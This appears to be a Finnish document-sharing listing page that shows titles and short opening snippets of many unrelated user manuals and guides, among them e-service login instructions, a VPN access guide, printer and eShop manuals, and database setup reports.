LUPAHANKKEET RAKENNUSVALVONNAN SAHKÖISESSÄ ASIOINTIPALVELUSSA - KIRJAUTUMINEN LUPAHANKKEET RAKENNUSVALVONNAN SAHKÖISESSÄ ASIOINTIPALVELUSSA - KIRJAUTUMINEN Rakennusvalvonnan sähköisessä asiointipalvelussa voi tehdä rakennusvalvonnan lupahakemuksia sähköisesti, sekä katsoa ja täydentää

Lisätiedot

WWW-sivut HTML-kielellä esitettyä hypertekstiaineistoa

WWW-sivut HTML-kielellä esitettyä hypertekstiaineistoa WWW ja tietokannat WWW-sivut HTML-kielellä esitettyä hypertekstiaineistoa tekstiä, kuvia, hyperlinkkejä Staattiset sivut kirjoitettu kerran, muuttaminen käsin ongelmana pysyminen ajantasalla Ylläpito hankalaa,

Lisätiedot

CEREMP-järjestelmän käyttöönotto

CEREMP-järjestelmän käyttöönotto CEREMP-järjestelmän käyttöönotto Ohje energian tukkumarkkinoiden markkinaosapuolille CEREMP-järjestelmän käyttöönottoon ja markkinaosapuolen ensimmäisen vaiheen rekisteröintiin Versio 1.0 Mikä on CEREMP?

Lisätiedot

eshop manuaali Atea Finland Oy 26.2.2015

eshop manuaali Atea Finland Oy 26.2.2015 2015 eshop manuaali Atea Finland Oy 26.2.2015 1 Sisältö 1.Yleistä... 2 2. Valikot... 2 2.1 Ylävalikko... 2 2.1.1. Omat sivut... 2 2.1.2. Asiakaspalvelu... 2 2.1.3. Lisenssit... 3 2.1.5. Ylläpito... 3 2.1.6.

Lisätiedot

Copyright 2008 Hewlett-Packard Development Company, L.P.

Copyright 2008 Hewlett-Packard Development Company, L.P. Suojaus Käyttöopas Copyright 2008 Hewlett-Packard Development Company, L.P. Microsoft ja Windows ovat Microsoft Corporationin Yhdysvalloissa rekisteröimiä tavaramerkkejä. Tässä olevat tiedot voivat muuttua

Lisätiedot

EASY PILVEN Myynnin opas - Storage IT

EASY PILVEN Myynnin opas - Storage IT EASY PILVEN Myynnin opas - Storage IT EASY Pilvi EASY Tiedostopalvelin: Tiedostojen tallennukseen ja jakamiseen soveltuva monipuolinen järjestelmä EASY Pilvipalvelin: Täysiverinen, skaalautuva käyttöjärjestelmän

Lisätiedot

Vaihdoitko puhelinta? Yhteystietojen siirto Lumian, iphonen ja Androidin välillä käy näin

Vaihdoitko puhelinta? Yhteystietojen siirto Lumian, iphonen ja Androidin välillä käy näin Vaihdoitko puhelinta? Yhteystietojen siirto Lumian, iphonen ja Androidin välillä käy näin Tekniikka 11.10.2015 10:45 Olavi Koistinen, Helsingin Sanomat Yhteystietojen siirto Androidista iphoneen kuin Gmail-käyttäjätunnus.

Lisätiedot

Yhteistyökumppanit kirjautuvat erikseen annetuilla tunnuksilla osoitteeseen

Yhteistyökumppanit kirjautuvat erikseen annetuilla tunnuksilla osoitteeseen 1 Etäyhteysohje (vpn.lappia.fi) Yleistä ssl-vpn etäkäyttöpalvelusta Koulutuskuntayhtymän henkilökunnalla ja opiskelijoilla on käytössään selaimella käytettävä etäkäyttöpalvelu. Palvelun kautta voi käyttää

Lisätiedot

AirPrint-opas. Tämä käyttöopas koskee seuraavia malleja:

AirPrint-opas. Tämä käyttöopas koskee seuraavia malleja: AirPrint-opas Tämä käyttöopas koskee seuraavia malleja: HL-340CW/350CDN/350CDW/370CDW/380CDW DCP-905CDW/900CDN/900CDW MFC-930CW/940CDN/9330CDW/9340CDW Versio A FIN Kuvakkeiden selitykset Tässä käyttöoppaassa

Lisätiedot

Kangasniemen yrityshakemisto KÄYTTÖOHJE YRITTÄJÄLLE. KANGASNIEMEN KUNTA yrityshakemisto.kangasniemi.fi

Kangasniemen yrityshakemisto KÄYTTÖOHJE YRITTÄJÄLLE. KANGASNIEMEN KUNTA yrityshakemisto.kangasniemi.fi 2015 Kangasniemen yrityshakemisto KÄYTTÖOHJE YRITTÄJÄLLE KANGASNIEMEN KUNTA yrityshakemisto.kangasniemi.fi 1 Sisällysluettelo 1. Sivustolle rekisteröityminen... 2 2. Yrityksen lisääminen... 3 2.1. Yritystiedot...

Lisätiedot

Wilman käyttöohje huoltajille

Wilman käyttöohje huoltajille Wilman käyttöohje huoltajille Sisällysluettelo: Sisään kirjautuminen... 1 Oma etusivu... 2 Pikaviestit... 3 Tiedotteet... 5 Suoritukset... 6 Poissaolot... 6 Palaute... 8 Opettajat... 9 Salasanan vaihto...

Lisätiedot

KÄYTTÖOHJE. Servia. S solutions

KÄYTTÖOHJE. Servia. S solutions KÄYTTÖOHJE Servia S solutions Versio 1.0 Servia S solutions Servia Finland Oy PL 1188 (Microkatu 1) 70211 KUOPIO puh. (017) 441 2780 info@servia.fi www.servia.fi 2001 2004 Servia Finland Oy. Kaikki oikeudet

Lisätiedot

Verkkosivut perinteisesti. Tanja Välisalo 11.2.2009

Verkkosivut perinteisesti. Tanja Välisalo 11.2.2009 Verkkosivut perinteisesti Tanja Välisalo 11.2.2009 WWW-sivujen vieminen omaan kotisivutilaan yliopiston mikroverkossa https://salasana.jyu.fi Klikkaa painiketta Activate WWW Klikkaa painiketta Activate

Lisätiedot

opiskelijan ohje - kirjautuminen

opiskelijan ohje - kirjautuminen opiskelijan ohje - kirjautuminen estudio on Edupolin kehittämä e-oppimisympäristö koulutusryhmän verkkoalustana perinteisen luokkaopetuksen tukena tai etäopiskelussa ja -opetuksessa kotoa tai työpaikalta.

Lisätiedot

Uuden palvelun lisääminen liityntäpalvelimelle esuomi.fi

Uuden palvelun lisääminen liityntäpalvelimelle esuomi.fi Uuden palvelun lisääminen liityntäpalvelimelle esuomi.fi esuomi.fi/palveluntarjoajille/palveluvayla/tekninen-aineisto/konfigurointiohjeita/uuden-palvelun-lisaaminen-liityntapalvelimelle/ Suomi.fi-palveluväylä

Lisätiedot

OPISKELIJAN PIKAOPAS

OPISKELIJAN PIKAOPAS SISÄLTÖ Työvälineet 3 Kirjautuminen ejollakseen 4 Salasana unohtui 5 Aloitusnäkymä 6 Toiminnot aloitusnäkymässä 7-8 Oma sähköpostiosoitteesi 9 Opiskelu 10 Omien suoritusten seuranta 11 Helppari auttaa

Lisätiedot

DIPLOMITYÖN, PRO GRADU TUTKIELMAN, KANDIDAATIN TYÖN TAI LISENSIAATINTUTKIMUKSEN TALLENTAMINEN LUTPUBIIN (DORIA-PALVELIMELLE)

DIPLOMITYÖN, PRO GRADU TUTKIELMAN, KANDIDAATIN TYÖN TAI LISENSIAATINTUTKIMUKSEN TALLENTAMINEN LUTPUBIIN (DORIA-PALVELIMELLE) DIPLOMITYÖN, PRO GRADU TUTKIELMAN, KANDIDAATIN TYÖN TAI LISENSIAATINTUTKIMUKSEN TALLENTAMINEN LUTPUBIIN (DORIA-PALVELIMELLE) Ole hyvä ja lue nämä 15-sivuiset tallennusohjeet huolellisesti läpi. Huomaa,

Lisätiedot

ENNI-järjestelmällä tehtävä selainennakkoilmoitus

ENNI-järjestelmällä tehtävä selainennakkoilmoitus SELAINENNAKKOILMOITUKSEN IKKUNANKUVAT 1(24) 2.2.2010 Selainennakkoilmoitus ENNI-järjestelmällä tehtävä selainennakkoilmoitus Yleistä ENNI-järjestelmästä ENNI-järjestelmän vakiopainikkeita Selainennakkoilmoitus

Lisätiedot

MY KNX, KNX sivu sinua varten Mitä pitää muistaa: Pidä tietosi ajan tasalla

MY KNX, KNX sivu sinua varten Mitä pitää muistaa: Pidä tietosi ajan tasalla MY KNX, KNX sivu sinua varten Mitä pitää muistaa: Pidä tietosi ajan tasalla Tervetuloa mukaan Sisällysluettelo yleistä... 3 MY KNX... 3 Kirjaudu KNX organisaation kotisivulle... 4 Partnerluettelo... 5

Lisätiedot

Kaupungin varauspalvelu, venepaikan varaus

Kaupungin varauspalvelu, venepaikan varaus Kaupungin varauspalvelu, venepaikan varaus kirjautuminen palveluun: https://asiointi.rauma.fi/epermit/fi/reservation Tämän ohjeen alussa kerrotaan miten luodaan käyttäjätunnus palveluun ja link itetään

Lisätiedot

SELVITYSRAPORTTI LABRA-VERKON MYSQL:n JA PHP:n KÄYTTÖÖNOTOSTA. Jarkko Kähkönen

SELVITYSRAPORTTI LABRA-VERKON MYSQL:n JA PHP:n KÄYTTÖÖNOTOSTA. Jarkko Kähkönen SELVITYSRAPORTTI LABRA-VERKON MYSQL:n JA PHP:n KÄYTTÖÖNOTOSTA Sisällysluettelo Luku 1 - Oman LABRA-sivutilan asennus ja käyttöönotto... 2 1.1 - LABRA-osoitteesi... 2 1.2 LABRA-tilan käyttö (verkko-asemana

Lisätiedot

RATKI 1.0 Käyttäjän ohje

RATKI 1.0 Käyttäjän ohje RATKI RATKI 1.0 Käyttäjän ohje Ohje 0.5 Luottamuksellinen Vastuuhenkilö Petri Ahola Sisällysluettelo 1. Yleistä... 3 1.1. Kuvaus... 3 1.2. Esitiedot... 3 1.3. RATKIn käyttöoikeuksien hankinta... 3 1.4.

Lisätiedot

SOPIMUSPRO - VERKKOPALVELUNOHJE. Seurantahenkilön ohje SopimusPro verkkopalveluun. Kirjautuminen verkkopalveluun

SOPIMUSPRO - VERKKOPALVELUNOHJE. Seurantahenkilön ohje SopimusPro verkkopalveluun. Kirjautuminen verkkopalveluun Seurantahenkilön ohje SopimusPro verkkopalveluun Työantajan ns. seurantahenkilönä - pääset verkkopalvelussa seuraamaan tehtyjä väli- ja päättöarviointeja ja koulutuskorvaushakemusten tilannetta sekä tulostamaan

Lisätiedot

Www-tallennuksen käyttöohje

Www-tallennuksen käyttöohje OPETUSHALLITUS Laskentapalvelut puh: (09) 7747 7090 E-mail: laskentapalvelut@oph.fi Www-tallennuksen käyttöohje Sisällys Käyttäjätunnukset Koulutuksen järjestäjä (saajatunnus) Laitokset/koulutusmuodot

Lisätiedot

Objective Marking. Taitaja 2014 Lahti. Skill Number 205 Skill Tietokoneet ja verkot Competition Day 1. Competitor Name

Objective Marking. Taitaja 2014 Lahti. Skill Number 205 Skill Tietokoneet ja verkot Competition Day 1. Competitor Name Objective ing Skill Number 205 Skill Tietokoneet ja verkot Competition Day 1 Sub Criterion SRV01 palvelin Sub Criterion A1 ing Scheme Lock 08-04-2014 09:35:59 Entry Lock 08-04-2014 19:36:30 O1 0.50 Palvelimen

Lisätiedot

Lindab eshop käyttöohjeet

Lindab eshop käyttöohjeet Lindab eshop käyttöohjeet A good thinking company Sisältö lindab we simplify construction Sivut 3-10: Kirjautuminen eshoppiin ja tilauksen teko Sivut 11-14: Tilausrivien pikasyöttö Sivut 15-21: Asiakkaan

Lisätiedot

Videoapua nuorille ja lapsiperheille - palvelu

Videoapua nuorille ja lapsiperheille - palvelu Videoapua nuorille ja lapsip perheille - palvelu Omalähetteen ja sähköisen ajanvarauksen käyttöohjeet asiakkaille 2 Sisällys 1 Verkkoneuvonnan käyttämiseen liittyvät tekniset vaatimukset... 3 2 Palveluun

Lisätiedot

Vältä Internet Explorer selainta WebOodin käytössä ilmenneiden ongelmien vuoksi

Vältä Internet Explorer selainta WebOodin käytössä ilmenneiden ongelmien vuoksi Versiopäivitys 4.4., versiomuutoksia WebOodissa Vältä Internet Explorer selainta WebOodin käytössä ilmenneiden ongelmien vuoksi Kirjautumisen aikakatkaisu (30 min.): selaimen kysely ja muistutukset istunnon

Lisätiedot

TIETOKANNAT: MYSQL & POSTGRESQL Seminaarityö

TIETOKANNAT: MYSQL & POSTGRESQL Seminaarityö TIETOKANNAT: MYSQL & POSTGRESQL Seminaarityö Tekijät: Eemeli Honkonen Joni Metsälä Työ palautettu: SISÄLLYSLUETTELO: 1 SEMINAARITYÖN KUVAUS... 3 2 TIETOKANTA... 3 2.1 MITÄ TIETOKANNAT SITTEN OVAT?... 3

Lisätiedot